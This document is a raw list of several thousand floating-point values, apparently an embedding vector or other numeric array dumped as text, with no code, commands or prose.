-0.026747386902570724, -0.023898644372820854, 0.003010428510606289, -0.005574297159910202, -0.012649958953261375, 0.0020306918304413557, -0.004969901870936155, -0.060116179287433624, 0.0033549724612385035, -0.027840688824653625, -0.0010114962933585048, -0.018262753263115883, -0.0069678714498877525, 0.021003706380724907, -0.009708824567496777, 0.006144045852124691, 0.012896336615085602, 0.021527258679270744, -0.015537198632955551, -0.008453837595880032, 0.01918666996061802, -0.026901373639702797, -0.014266813173890114, -0.021250084042549133, 0.020587943494319916, 0.01763140968978405, -0.010424859821796417, -0.023960238322615623, 0.03763420507311821, 0.0025138233322650194, 0.013851050287485123, 0.05257085710763931, -0.008561627939343452, 0.0067407418973743916, 0.02020297758281231, 0.000431642314651981, 0.0031451662071049213, -0.00645971717312932, 0.026685792952775955, 0.019540837034583092, -0.032922230660915375, 0.04711975157260895, -0.028395038098096848, 0.013743259944021702, 0.03356897085905075, -0.021126894280314445, -0.030073488131165504, -0.001953698694705963, -0.005782178603112698, -0.03249106928706169, 0.02813326194882393, -0.025068938732147217, -0.06319589912891388, -0.02277454547584057, 0.008731012232601643, 0.03477006405591965, -0.021958420053124428, -0.007271993905305862, -0.02665499597787857, 0.007337438408285379, -0.008600124157965183, -0.014613281935453415, 0.01335829496383667, -0.026347024366259575, 0.0020499401725828648, 0.0022866937797516584, -0.014151323586702347, 0.007483724970370531, 0.01872471161186695, -0.04117588698863983, -0.022635959088802338, 0.015814373269677162, 0.011148594319820404, 0.0037668852601200342, -0.03230628743767738, 0.04524112120270729, 0.02454538643360138, 0.005997758824378252, -0.029380550608038902, -0.023683063685894012, -0.022682154551148415, -0.0013165812706574798, -0.019371453672647476, 0.013212008401751518, -0.000008819614777166862, -0.007302791345864534, -0.018154961988329887, -0.01689227670431137, 0.021542657166719437, 0.019787214696407318, 0.0021076849661767483, 0.039636023342609406, -0.0212192852050066, 0.0012482499005272985, 0.0032067608553916216, 0.0069640218280255795, 0.0021866026800125837, -0.0026851329021155834, -0.034061726182699203, -0.00922376848757267, -0.010486453771591187, -0.007683906704187393, 0.0217120423913002, -0.00628648279234767, 0.01599915698170662, 0.003174038603901863, -0.021188488230109215, -0.0042962124571204185, -0.015845170244574547, 0.022743748500943184, 0.008330648764967918, 0.0029642325825989246, 0.05152375251054764, -0.014721072278916836, -0.019417649134993553, 0.021681243553757668, -0.011995517648756504, -0.015144534409046173, -0.028533626347780228, -0.009516341611742973, -0.012780847027897835, -0.0012636485043913126, -0.03181353211402893, -0.01687687821686268, -0.00039483001455664635, 0.006725343409925699, -0.026824381202459335, 0.015552597120404243, 0.008731012232601643, 0.006328829098492861, 0.008900397457182407, 0.010255474597215652, 0.016384122893214226, 0.009254565462470055, -0.01305802259594202, 0.008877299726009369, -0.02141946740448475, 0.009447047486901283, 0.020218376070261, -0.0017438926734030247, 0.0008676155121065676, 0.0033684461377561092, -0.009470146149396896, 0.004581086803227663, 0.014482393860816956, 0.02265135757625103, 0.029734717682003975, 0.013389091938734055, 0.011910825967788696, -0.04354727268218994, -0.029195766896009445, 0.010963811539113522, 0.016091547906398773, -0.009608733467757702, 0.017785396426916122, 0.016846081241965294, -0.0035224321763962507, 0.018154961988329887, 0.02543850615620613, 0.0023059421218931675, 0.0033549724612385035, -0.029734717682003975, -0.010255474597215652, 0.007907186634838581, -0.008115068078041077, -0.0017217572312802076, -0.005666689015924931, -0.015614192001521587, -0.005116188433021307, 0.01681528240442276, 0.02360607124865055, 0.0006265309639275074, -0.05839153379201889, -0.003149016061797738, -0.003888149280101061, 0.03806536644697189, -0.016522709280252457, 0.01098690927028656, -0.005635891575366259, 0.009508642368018627, -0.02603905089199543, -0.0212192852050066, 0.0013194684870541096, 0.006421220954507589, -0.019987396895885468, 0.012973329983651638, -0.012157203629612923, 0.017954779788851738, -0.014451596885919571, -0.02392944134771824, -0.0185245294123888, -0.039358850568532944, -0.008423040620982647, 0.02426821179687977, -0.028995584696531296, -0.02068033441901207, -0.0064751161262393, -0.009031285531818867, -0.015075240284204483, -0.05635891482234001, 0.008215159177780151, -0.046411413699388504, 0.01621473766863346, 0.012111007235944271, -0.028533626347780228, 0.027317136526107788, -0.008977389894425869, -0.0005610868684016168, 0.016491912305355072, 0.0007588628213852644, -0.03430810570716858, 0.06070132553577423, -0.03594035655260086, -0.007699305657297373, 0.0011741440976038575, 0.020187579095363617, 0.0057436819188296795, 0.008261354640126228, -0.01966402679681778, -0.009924405254423618, 0.011933923698961735, -0.0060516539961099625, -0.03507803753018379, -0.016091547906398773, -0.009801216423511505, -0.02372925914824009, 0.018139563500881195, -0.04206900671124458, 0.029149571433663368, 0.006613703444600105, -0.008446138352155685, 0.015952961519360542, -0.006028556264936924, -0.004665778949856758, -0.00401903735473752, -0.0055511994287371635, -0.024514589458703995, -0.003743787296116352, 0.011040803976356983, -0.023313498124480247, 0.0033030021004378796, 0.015013645403087139, -0.025546295568346977, 0.01447469461709261, -0.043578069657087326, -0.002918036887422204, -0.0026658845599740744, 0.01709245890378952, 0.0019267512252554297, -0.017785396426916122, -0.011810734868049622, -0.021265482529997826, 0.0046311323530972, -0.002910337410867214, 0.00935465656220913, 0.016907675191760063, -0.010216978378593922, -0.027779094874858856, 0.023082518950104713, -0.04280813783407211, -0.01074823085218668, -0.023883245885372162, -0.029057178646326065, -0.009985999204218388, -0.02874920703470707, -0.009577936492860317, -0.005300971679389477, 0.004226918797940016, 0.010540349408984184, 0.0020114434882998466, 0.03634072095155716, 0.007914885878562927, 0.024437595158815384, -0.026762785390019417, 0.015783576294779778, -0.03139776736497879, 0.0025061238557100296, 0.023744657635688782, -0.015567995607852936, 0.02610064670443535, 0.0027255541644990444, -0.030011892318725586, -0.0005577184492722154, 0.0271939467638731, -0.016353324055671692, -0.002173129003494978, -0.03378455340862274, -0.013974239118397236, 0.010494153015315533, -0.020125985145568848, -0.018077969551086426, -0.011010007001459599, 0.02591586299240589, -0.00737593462690711, 0.009054383262991905, -0.03205990791320801, 0.003097045700997114, 0.01227269321680069, -0.007010217756032944, -0.004885209258645773, 0.03729543462395668, -0.011933923698961735, 0.017077060416340828, 0.02902638167142868, -0.01695387065410614, 0.003736088052392006, -0.031074397265911102, -0.03748022019863129, 0.01878630556166172, 0.004939104430377483, -0.011271783150732517, -0.015537198632955551, -0.022020014002919197, 0.005843773018568754, 0.027840688824653625, -0.012326587922871113, -0.046349819749593735, -0.006067052949219942, -0.03261425718665123, -0.0020403158850967884, -0.017723800614476204, -0.005724433809518814, -0.007283543236553669, -0.027086157351732254, -0.0004662892024498433, 0.0024984246119856834, 0.01047875452786684, 0.010432559065520763, 0.015552597120404243, 0.003632147330790758, 0.012010917067527771, -0.007672357838600874, -0.020926712080836296, -0.01858612336218357, -0.021958420053124428, -0.031289976090192795, 0.008800306357443333, 0.000257686129771173, 0.05540420114994049, -0.023960238322615623, 0.0006505913333967328, 0.013289001770317554, 0.03600195422768593, 0.008684816770255566, -0.006301881745457649, -0.026223834604024887, -0.008946592919528484, 0.012626861222088337, 0.0015148383099585772, 0.016260933130979538, -0.018909495323896408, -0.014574785716831684, -0.0024888005573302507, 0.009747320786118507, 0.003087421413511038, 0.005069992505013943, -0.002344438573345542, 0.0408371165394783, -0.02874920703470707, -0.008045773953199387, 0.009454747661948204, -0.010116887278854847, -0.028502829372882843, -0.009747320786118507, 0.031844329088926315, -0.008022676222026348, 0.0015475604450330138, -0.03932805359363556, -0.034277308732271194, -0.011880028061568737, -0.005170083604753017, -0.023713860660791397, -0.032521866261959076, -0.019833410158753395, 0.01619933918118477, -0.02508433721959591, -0.009062082506716251, -0.008430739864706993, 0.016861479729413986, 0.0028410437516868114, 0.02745572291314602, -0.016091547906398773, -0.0168306827545166, 0.009785817004740238, 0.017030863091349602, -0.02068033441901207, -0.008207459934055805, -0.03396933525800705, -0.02392944134771824, 0.0025946658570319414, -0.025115134194493294, -0.0022212497424334288, 0.030396858230233192, -0.00683313375338912, 0.04280813783407211, 0.013874148949980736, -0.02528451941907406, -0.010994608514010906, -0.020048990845680237, -0.009038984775543213, -0.038219351321458817, 0.03960522636771202, -0.016938472166657448, -0.006652200128883123, -0.008908096700906754, 0.021943021565675735, 0.02529991790652275, -0.0002855961211025715, 0.0030296766199171543, 0.007880238816142082, 0.027963878586888313, 0.0010615417268127203, -0.03594035655260086, 0.049614325165748596, -0.013573875650763512, 0.0027101554442197084, -0.0184321366250515, -0.00299118016846478, -0.02034156583249569, -0.051092591136693954, 0.00048313141451217234, 0.014505491591989994, 0.017954779788851738, -0.020433956757187843, 0.020172180607914925, 0.01606075093150139, 0.01586056873202324, -0.03831174597144127, -0.006020857021212578, -0.017261842265725136, -0.026639597490429878, 0.007337438408285379, -0.023513678461313248, -0.018693914636969566, -0.0013108067214488983, -0.01183383259922266, 0.005755230784416199, 0.0058514722622931, 0.040991101413965225, -0.010933013632893562, -0.01661510206758976, 0.0030239021871238947, -0.014659477397799492, 0.00793028436601162, 0.024360602721571922, -0.003349198028445244, 0.001812224043533206, 0.012649958953261375, 0.028841597959399223, 0.004973751492798328, 0.002648561028763652, 0.001194354728795588, 0.027024561539292336, -0.016846081241965294, -0.022820740938186646, 0.025992855429649353, -0.008253655396401882, -0.012611462734639645, 0.0018815178191289306, 0.02827185019850731, 0.006571357138454914, -0.03313780948519707, -0.031212985515594482, 0.0015995306894183159, 0.007179602514952421, 0.012757749296724796, 0.01013228576630354, 0.000939796504098922, -0.027163149788975716, 0.028164058923721313, -0.014867358841001987, 0.05962342396378517, -0.027317136526107788, 0.0058899689465761185, 0.007345137652009726, -0.0018632319988682866, -0.009185271337628365, 0.011302580125629902, -0.004800517112016678, -0.012765448540449142, -0.04496394470334053, 0.01311961654573679, -0.02679358422756195, -0.023960238322615623, -0.024222014471888542, -0.02034156583249569, 0.014967449940741062, -0.01723104529082775, -0.0003329949686303735, 0.00030941583099775016, 0.00017888855654746294, -0.008130466565489769, -0.014520890079438686, 0.028225654736161232, -0.009416250512003899, 0.02007978968322277, -0.010902216657996178, -0.005836073774844408, -0.021958420053124428, 0.006505913101136684, -0.022543566301465034, 0.015090638771653175, 0.014605582691729069, -0.06270314753055573, 0.029549933969974518, 0.011187090538442135, -0.025684883818030357, -0.003528206842020154, -0.00549345463514328, -0.016260933130979538, -0.013304400257766247, -0.008061173371970654, -0.011572056449949741, -0.03289143368601799, 0.0058938185684382915, 0.00713725620880723, 0.08623222261667252, 0.02562328800559044, -0.02563868835568428, -0.005809125956147909, -0.018278151750564575, -0.004850562661886215, -0.014567086473107338, 0.011079301126301289, 0.003430040553212166, 0.007984180003404617, 0.020926712080836296, 0.00010857223969651386, -0.006802336312830448, 0.004592635668814182, 0.011641349643468857, -0.0012270768638700247, 0.00003756419027922675, -0.0009412401122972369, 0.004223069176077843, 0.001086564501747489, -0.0024426046293228865, 0.029211165383458138, 0.022805342450737953, -0.013327497988939285, 0.012365085072815418, -0.01342758908867836, 0.01231118943542242, -0.011856930330395699, -0.024191217496991158, -0.003609049366787076, -0.011256384663283825, -0.021049901843070984, -0.013342896476387978, 0.004353957250714302, 0.02630082704126835, 0.02265135757625103, 0.0037745845038443804, 0.0037264639977365732, 0.00627493392676115, -0.01227269321680069, -0.0015937562566250563, 0.01526002399623394, -0.011610552668571472, -0.0034877853468060493, 0.004615733865648508, -0.03424651175737381, 0.03418491780757904, 0.01346608530730009, -0.0108560211956501, -0.0023348145186901093, -0.00768005708232522, -0.0250997357070446, 0.0062787835486233234, 0.06572127342224121, -0.008353746496140957, 0.003878525225445628, -0.005485755391418934, 0.015267723239958286, -0.023790854960680008, -0.020249173045158386, -0.0006472228560596704, 0.008738711476325989, 0.015090638771653175, 0.01615314371883869, 0.020711131393909454, -0.020587943494319916, -0.03661789745092392, -0.0014580560382455587, 0.009731922298669815, 0.0153909120708704, 0.013450686819851398, 0.007091060280799866, 0.002798697678372264, -0.0032606557942926884, 0.018539927899837494, 0.04129907488822937, -0.007891788147389889, -0.004823614843189716, -0.04690416902303696, -0.013019525445997715, 0.027378730475902557, 0.02203541249036789, 0.0025580942165106535, 0.000268753879936412, -0.032244693487882614, 0.007922585122287273, 0.0008036150247789919, 0.00036066435859538615, 0.001034594140946865, -0.008253655396401882, -0.00518548209220171, -0.023821651935577393, 0.025315316393971443, 0.03477006405591965, -0.015483302995562553, 0.017338836565613747, 0.007279693614691496, -0.006063203327357769, -0.002273219870403409, -0.006944773718714714, 0.009839712642133236, 0.014374603517353535, 0.0018449460621923208, 0.010902216657996178, -0.014605582691729069, 0.00744137866422534, 0.032244693487882614, 0.029457543045282364, -0.017323438078165054, -0.018539927899837494, -0.03344578295946121, -0.002727478975430131, -0.005966961849480867, -0.029950298368930817, -0.019571634009480476, -0.0005206655478104949, 0.009816614910960197, 0.02223559468984604, 0.0048813596367836, -0.02175823785364628, -0.010632741264998913, 0.004854412283748388, 0.017754599452018738, -0.01870931312441826, 0.007010217756032944, 0.0016312904190272093, -0.012372784316539764, -0.01115629356354475, 0.034000132232904434, 0.019956599920988083, 0.013843351043760777, 0.00946244690567255, -0.014975149184465408, -0.014875058084726334, 0.04040595516562462, -0.008453837595880032, -0.007803246378898621, 0.013135015033185482, 0.01013228576630354, -0.005566597916185856, -0.0056320419535040855, 0.0299810953438282, 0.016645899042487144, 0.04490235075354576, 0.010324768722057343, -0.01451319083571434, -0.006802336312830448, 0.009362355805933475, 0.015213827602565289, 0.011017706245183945, -0.004504093900322914, -0.008061173371970654, 0.009239166975021362, 0.04311611130833626, -0.00033876943052746356, -0.003828479675576091, 0.0056320419535040855, -0.04246937111020088, -0.0028006224893033504, 0.02157345414161682, 0.0011038879165425897, 0.03246027231216431, 0.02970392070710659, 0.006013157777488232, -0.0005870720488019288, 0.0259004645049572, -0.01615314371883869, -0.03249106928706169, -0.030335264280438423, -0.02496114932000637, -0.01102540548890829, 0.017677605152130127, -0.02679358422756195, -0.015760477632284164, 0.02563868835568428, 0.004346258006989956, -0.016307128593325615, 0.0008146827458404005, -0.01619933918118477, 0.010432559065520763, 0.009254565462470055, 0.02006438933312893, -0.008938893675804138, -0.007329738698899746, 0.03052004799246788, -0.04237697646021843, 0.03329179808497429, -0.006817735265940428, -0.01709245890378952, 0.007961082272231579, 0.014128225855529308, 0.02000279538333416, -0.02705536037683487, -0.0089157959446311, -0.018416738137602806, -0.021665845066308975, 0.0020922862458974123, -0.017246443778276443, -0.00867711752653122, 0.010086090303957462, 0.0052047306671738625, 0.010278573259711266, 0.006090150680392981, -0.006606004200875759, 0.001634177635423839, -0.021511860191822052, 0.006094000302255154, 0.0040998803451657295, 0.006856231484562159, -0.0014445822453126311, -0.02773289941251278, 0.016430318355560303, 0.008808005601167679, 0.014798065647482872, 0.0018410964403301477, -0.003070098115131259, 0.03159794956445694, -0.02305172011256218, -0.011279482394456863, 0.0344620905816555, -0.020972907543182373, -0.003555154427886009, 0.007953383028507233, -0.013342896476387978, -0.017338836565613747, -0.010809824801981449, 0.019787214696407318, -0.006263385061174631, -0.02414502203464508, 0.005755230784416199, 0.009416250512003899, 0.0174312274903059, 0.0038727507926523685, 0.01122558768838644, -0.010047594085335732, 0.018077969551086426, 0.0011144744930788875, 0.002150031039491296, 0.009932104498147964, -0.0492139607667923, -0.0032202345319092274, -0.006721493788063526, -0.012126406654715538, -0.0008170888177119195, -0.014721072278916836, -0.0002923330175690353, 0.0045194923877716064, 0.033261001110076904, -0.010809824801981449, 0.01586056873202324, -0.004080631770193577, 0.011441168375313282, 0.009123677387833595, 0.01128718163818121, 0.004912157077342272, 0.03452368453145027, 0.0017063586274161935, -0.011094699613749981, 0.021450264379382133, -0.019679425284266472, 0.028194857761263847, -0.01695387065410614, -0.02948834002017975, 0.005566597916185856, -0.029318954795598984, 0.019417649134993553, -0.00827675312757492, 0.01986420899629593, 0.0019171270541846752, -0.003308776533231139, -0.004157625138759613, 0.009778117761015892, 0.0084153413772583, -0.0023463633842766285, -0.036925870925188065, -0.013650869019329548, -0.023498279973864555, -0.019356053322553635, -0.02610064670443535, -0.0008031338220462203, 0.010802125558257103, 0.04570307955145836, -0.0029045629780739546, -0.0016168542206287384, -0.016599703580141068, 0.011910825967788696, -0.01091761514544487, 0.006028556264936924, -0.0033992433454841375, -0.005412611644715071, 0.015614192001521587, 0.013889547437429428, -0.027009163051843643, -0.01607614941895008, 0.010301670990884304, -0.0029122622217983007, -0.012634560465812683, 0.03723384067416191, -0.009200669825077057, -0.006575206760317087, 0.025315316393971443, 0.007860991172492504, 0.024945750832557678, 0.04299292340874672, -0.0039843907579779625, 0.026223834604024887, -0.0010653913486748934, -0.002269370248541236, 0.006255685817450285, 0.0168306827545166, 0.021311677992343903, -0.032675851136446, -0.009601034224033356, -0.010963811539113522, 0.003799607278779149, 0.02305172011256218, 0.007449077907949686, -0.00028487431700341403, 0.008815704844892025, -0.01599915698170662, 0.017585214227437973, 0.02223559468984604, 0.007741651497781277, -0.024576183408498764, -0.0002901675761677325, 0.009200669825077057, -0.007395183201879263, 0.024591581895947456, 0.004788968246430159, -0.018293550238013268, 0.005990059580653906, 0.03310701251029968, 0.02197381854057312, 0.025869667530059814, 0.020433956757187843, 0.0040652332827448845, 0.01749282144010067, 0.014420798979699612, 0.010401762090623379, -0.006078601814806461, -0.006417371332645416, 0.02773289941251278, -0.027240142226219177, -0.0010461431229487062, 0.025607889518141747, 0.002388709457591176, 0.018801704049110413, 0.013789456337690353, -0.011279482394456863, -0.006490514613687992, -0.02514593116939068, -0.005081541836261749, -0.014320707879960537, 0.023991035297513008, -0.0065097627229988575, 0.017400430515408516, -0.009146775119006634, 0.003851577639579773, -0.003687967313453555, -0.020634138956665993, -0.015644988045096397, -0.011926224455237389, 0.008561627939343452, 0.009177572093904018, -0.011887727305293083, 0.025315316393971443, -0.008646320551633835, -0.013235106132924557, -0.007479875348508358, -0.01231118943542242, 0.011056202463805676, 0.007248896174132824, -0.02426821179687977, -0.0023136413656175137, -0.011502762325108051, 0.010740531608462334, 0.029611529782414436, -0.00347623648121953, -0.021527258679270744, 0.003383844858035445, 0.004430950153619051, -0.003264505648985505, 0.0035628536716103554, -0.003137466963380575, -0.021619649603962898, -0.006090150680392981, -0.005116188433021307, 0.011264083907008171, -0.00640582200139761, -0.01027087401598692, 0.008808005601167679, 0.006117098033428192, -0.012080210261046886, 0.06399662792682648, 0.009485544636845589, -0.018201157450675964, 0.007221948821097612, 0.011210189200937748, -0.038219351321458817, -0.0019306008471176028, 0.009408551268279552, 0.016645899042487144, -0.01522922609001398, 0.010640440508723259, 0.0026177638210356236, 0.011741440743207932, -0.003878525225445628, -0.02386784739792347, 0.024406798183918, 0.010255474597215652, 0.015629589557647705, 0.011803035624325275, 0.008831103332340717, -0.00956253707408905, -0.00720270024612546, -0.010648139752447605, -0.006525161676108837, -0.00987050961703062, -0.008338348008692265, 0.0035782521590590477, 0.0016004930948838592, 0.033876944333314896, -0.010301670990884304, -0.026901373639702797, -0.010571146383881569, 0.002683208091184497, 0.01729264110326767, -0.024252813309431076, 0.014721072278916836, 0.0106096426025033, 0.004334709141403437, 0.03711065277457237, 0.0019594733603298664, 0.02591586299240589, 0.00421921955421567, -0.007476025726646185, -0.0017207948258146644, 0.013196609914302826, -0.006425070576369762, -0.015691185370087624, 0.005454957950860262, -0.008877299726009369, -0.021650446578860283, 0.0009662628290243447, 0.00415377551689744, -0.007976480759680271, -0.0010259324917569757, 0.004122978076338768, -0.011972419917583466, -0.009654928930103779, 0.036248330026865005, 0.007595364935696125, -0.0016553506720811129, 0.00963183119893074, 0.004199970979243517, 0.002367536537349224, 0.006956322584301233, -0.011163992807269096, -0.0012068661162629724, 0.0008016902138479054, 0.0348624549806118, -0.005986209958791733, 0.021604251116514206, -0.007922585122287273, 0.0174312274903059, 0.021881425753235817, -0.004769719671458006, -0.006913976278156042, 0.0060516539961099625, -0.02305172011256218, 0.013758659362792969, -0.016245534643530846, 0.010378663428127766, -0.01655350625514984, -0.008399941958487034, 0.013935742899775505, -0.010709733702242374, -0.019309857860207558, 0.0018256978364661336, -0.0014503566781058908, -0.0041768732480704784, 0.018693914636969566, -0.007033315487205982, -0.006194091401994228, 0.012734651565551758, 0.04145305976271629, 0.007329738698899746, 0.016399521380662918, -0.0011876178905367851, 0.007984180003404617, -0.014243715442717075, -0.008869599550962448, -0.01715405285358429, 0.009092879481613636, -0.002894938923418522, -0.0024580033496022224, 0.012172602117061615, 0.019694823771715164, 0.021481063216924667, 0.0010509551502764225, -0.02861061878502369, -0.009885908104479313, 0.012649958953261375, -0.006794637069106102, 0.018740110099315643, -0.01790858432650566, -0.009678026661276817, 0.011918525211513042, 0.008461536839604378, -0.008584725670516491, 0.0106096426025033, 0.0009754057973623276, 0.014736470766365528, 0.013027224689722061, 0.0019700597040355206, -0.00640582200139761, 0.001287708873860538, -0.0008815705077722669, -0.03384614735841751, 0.004542590118944645, 0.002400258556008339, 0.009654928930103779, 0.008068872615695, -0.00420382060110569, -0.014151323586702347, -0.010517251677811146, -0.01958703249692917, 0.007329738698899746, -0.014259113930165768, -0.008199760690331459, -0.002654335694387555, -0.018632318824529648, -0.009115978144109249, -0.02257436327636242, -0.0004383792111184448, -0.0011356475297361612, 0.016091547906398773, -0.007333588320761919, 0.0318751260638237, -0.019510040059685707, 0.0065405601635575294, -0.015414009802043438, 0.0018613070715218782, -0.003021977376192808, 0.004850562661886215, -0.026639597490429878, 0.005408762022852898, -0.03363056480884552, -0.007179602514952421, 0.002648561028763652, -0.021311677992343903, -0.00026033277390524745, -0.013720162212848663, -0.007687756791710854, -0.01986420899629593, 0.013673966750502586, -0.0014311084523797035, 0.012973329983651638, -0.0026062149554491043, -0.001674599014222622, 0.006867780350148678, -0.0004148000734858215, 0.007237347308546305, 0.022358782589435577, 0.008992789313197136, 0.00032722047762945294, -0.008030375465750694, 0.009447047486901283, 0.0007728178170509636, -0.02068033441901207, 0.0010759779252111912, 0.007214249111711979, -0.012087909504771233, 0.010332467965781689, -0.002879540203139186, 0.001879593008197844, -0.013712462969124317, -0.0013223557034507394, 0.015329317189753056, -0.00634037796407938, 0.0004482439544517547, 0.009662628173828125, -0.038342542946338654, 0.004126827698200941, 0.010471055284142494, -0.021373271942138672, 0.0070025185123085976, -0.017600612714886665, -0.02197381854057312, -0.008615522645413876, -0.001734268618747592, -0.004238467663526535, -0.019371453672647476, -0.0016957720508798957, -0.009123677387833595, -0.011518160812556744, -0.008376844227313995, 0.008161263540387154, -0.005766779650002718, 0.029827110469341278, -0.02177363634109497, 0.016445716843008995, -0.022127803415060043, -0.013620071113109589, -0.013974239118397236, 0.0084153413772583, 0.04209980368614197, 0.015090638771653175, -0.02394483983516693, -0.007826344110071659, 0.01128718163818121, -0.022266391664743423, 0.0001079707290045917, -0.003924720920622349, -0.001939262612722814, 0.026331625878810883, 0.03212150186300278, -0.01024007610976696, 0.0011693320702761412, -0.03384614735841751, 0.021681243553757668, 0.023991035297513008, 0.004061383660882711, -0.0060054585337638855, -0.004080631770193577, -0.0003536868607625365, 0.013851050287485123, 0.011264083907008171, 0.007660808973014355, -0.0004249054181855172, 0.010909915901720524, 0.028502829372882843, 0.010578845627605915, -0.005685937125235796, 0.012803944759070873, 0.014805764891207218, -0.009500943124294281, 0.0028371941298246384, -0.0035975005012005568, -0.006401972379535437, -0.005123887676745653, -0.012357385829091072, 0.014774966984987259, 0.0033511228393763304, -0.004173023626208305, -0.006979420315474272, -0.00015735455963294953, -0.010655838996171951, 0.0084153413772583, -0.002061489038169384, 0.005412611644715071, 0.00928536243736744, 0.0027024562004953623, 0.020048990845680237, -0.005220129154622555, -0.029118774458765984, -0.02562328800559044, -0.021126894280314445, 0.005697485990822315, 0.016399521380662918, 0.005843773018568754, -0.0066252523101866245, -0.0014965524896979332, 0.020526347681879997, 0.00959333498030901, 0.0061671435832977295, 0.01261916197836399, 0.012542168609797955, 0.01179533638060093, 0.020911313593387604, 0.005004548467695713, 0.024791764095425606, -0.010340167209506035, 0.0038092313334345818, 0.022682154551148415, -0.0018930668011307716, -0.0011096624657511711, -0.015352414920926094, -0.013827952556312084, 0.01926366239786148, 0.001800675061531365, -0.006240287330001593, 0.005720584187656641, -0.00292573613114655, 0.00029642326990142465, 0.0004566650604829192, -0.002879540203139186, -0.032675851136446, 0.007587665691971779, -0.0056281923316419125, 0.004315460566431284, -0.01987960748374462, -0.0006539597525261343, -0.017184849828481674, -0.0026466362178325653, -0.0370490588247776, -0.0016755614196881652, 0.01667669601738453, -0.0008863825350999832, 0.003843878395855427, -0.011333378031849861, -0.005031496286392212, -0.005874569993466139, 0.0070833610370755196, -0.006251836195588112, 0.017939381301403046, -0.0012723102699965239, -0.0027967726346105337, 0.008222858421504498, -0.010563447140157223, 0.01906348019838333, -0.017400430515408516, 0.009801216423511505, -0.0101091880351305, 0.015983758494257927, 0.014628680422902107, -0.01020157989114523, -0.020695732906460762, 0.014490093104541302, 0.013974239118397236, -0.016568904742598534, 0.015406310558319092, -0.00006394032971002162, -0.0058591715060174465, -0.012295790947973728, -0.017385032027959824, -0.001008609076961875, -0.0012713478645309806, 0.009801216423511505, 0.013004126958549023, 0.026624199002981186, 0.002034541452303529, 0.03227549046278, -0.005069992505013943, -0.000025488912797300145, 0.017246443778276443, -0.018077969551086426, -0.028841597959399223, -0.003828479675576091, 0.006825434509664774, 0.028672214597463608, 0.013997337780892849, 0.009847411885857582, 0.0039535933174192905, -0.006348077207803726, -0.0000836096442071721, -0.003938194829970598, 0.006940924096852541, -0.015136835165321827, 0.013204309158027172, -0.010355565696954727, 0.010255474597215652, 0.0018747808644548059, 0.00952404085546732, -0.0028930141124874353, 0.006375025026500225, -0.009801216423511505, 0.004608034156262875, 0.003807306522503495, -0.0017188700148835778, 0.004045985173434019, 0.0072758435271680355, -0.0004708606575150043, 0.005131586920469999, 0.014905855990946293, 0.02258976176381111, -0.012418979778885841, -0.02286693826317787, -0.013196609914302826, -0.005170083604753017, 0.008338348008692265, -0.002348288195207715, 0.012087909504771233, 0.004835163708776236, 0.01817036047577858, -0.0137971555814147, 0.031043600291013718, -0.003999789245426655, -0.005331769119948149, 0.018909495323896408, -0.0009446085314266384, 0.005466506816446781, 0.01268075592815876, 0.007221948821097612, 0.005393363535404205, 0.0024021833669394255, 0.007872539572417736, 0.006613703444600105, 0.012341986410319805, -0.004908307455480099, -0.0023598370607942343, -0.003524357220157981, -0.00919297058135271, 0.0067368922755122185, 0.010293971747159958, -0.0036456212401390076, 0.005986209958791733, 0.00847693532705307, -0.002583116991445422, 0.007776298560202122, 0.0008392243180423975, -0.009508642368018627, 0.0075376201421022415, 0.027224743738770485, 0.019771816208958626, 0.018616920337080956, 0.015244624577462673, 0.015845170244574547, 0.01383565180003643, 0.001997969811782241, -0.009423949755728245, 0.009801216423511505, -0.03212150186300278, 0.005716734565794468, 0.0038804500363767147, 0.0004068601701874286, -0.014690275304019451, -0.00549345463514328, 0.01522922609001398, 0.00860782340168953, 0.008292151615023613, 0.007529920898377895, 0.013843351043760777, -0.003922796342521906, 0.0035532296169549227, -0.0007954345201142132, 0.011333378031849861, -0.01723104529082775, 0.006679147481918335, -0.009755020029842854, -0.008700215257704258, -0.0057090348564088345, 0.014182120561599731, -0.02103450335562229, 0.0009484582114964724, 0.012865539640188217, -0.01410512812435627, -0.01735423505306244, -0.008553928695619106, 0.0153909120708704, -0.028025472536683083, -0.001722719636745751, 0.0081689627841115, 0.00506614288315177, 0.005281723570078611, -0.006259535439312458, 0.0042577157728374004, -0.011248685419559479, 0.0017592912772670388, 0.004538740497082472, 0.0008599162101745605, 0.011187090538442135, -0.004531041253358126, 0.008808005601167679, 0.02251276932656765, -0.0012982954503968358, -0.014790366403758526, -0.02597745694220066, 0.009146775119006634, 0.005081541836261749, 0.018139563500881195, 0.009139075875282288, 0.012734651565551758, -0.0129502322524786, 0.0054010627791285515, 0.01434380654245615, -0.015583394095301628, -0.0002215956337749958, -0.023513678461313248, -0.009239166975021362, -0.009131376631557941, -0.00987050961703062, 0.012018616311252117, -0.011010007001459599, -0.0101091880351305, -0.015221526846289635, -0.009785817004740238, -0.011502762325108051, -0.028656816110014915, 0.005990059580653906, 0.005697485990822315, 0.017677605152130127, -0.010463356040418148, -0.007060263305902481, 0.009231467731297016, -0.007102609146386385, -0.0017015464836731553, 0.013650869019329548, 0.0042153699323534966, -0.001544673228636384, -0.016291730105876923, 0.007822494022548199, -0.009678026661276817, 0.029888704419136047, 0.011779937893152237, 0.02175823785364628, -0.009924405254423618, -0.008569327183067799, -0.03202911093831062, 0.016430318355560303, -0.0010807900689542294, -0.018093368038535118, -0.016260933130979538, 0.018016375601291656, 0.007298941724002361, 0.0019921953789889812, 0.0008036150247789919, -0.013327497988939285, 0.006856231484562159, 0.0034184916876256466, 0.007780148182064295, 0.015783576294779778, 0.01987960748374462, -0.015075240284204483, 0.027501920238137245, -0.001503289444372058, -0.019371453672647476, -0.0066598993726074696, -0.02603905089199543, 0.011672147549688816, 0.01613774523139, -0.003609049366787076, 0.007402882445603609, 0.00836914498358965, 0.012996427714824677, 0.0027890733908861876, -0.000438138609752059, -0.007968781515955925, -0.0025253721978515387, -0.01013228576630354, -0.011495063081383705, 0.014674876816570759, 0.015714282169938087, 0.018278151750564575, -0.02528451941907406, -0.00317018898203969, -0.013435288332402706, -0.020834321156144142, -0.040590737015008926, 0.006336528342217207, 0.007468326482921839, -0.014336107298731804, 0.0066252523101866245, -0.0023232654202729464, -0.00359557569026947, -0.0020922862458974123, 0.007872539572417736, 0.017030863091349602, 0.020664935931563377, -0.0044886949472129345, 0.0044424994848668575, -0.025068938732147217, -0.013681665994226933, -0.0019508115947246552, -0.005462657194584608, -0.004380905069410801, -0.006024706643074751, -0.0015302370302379131, 0.023575274273753166, -0.0021904525347054005, -0.011772237718105316, 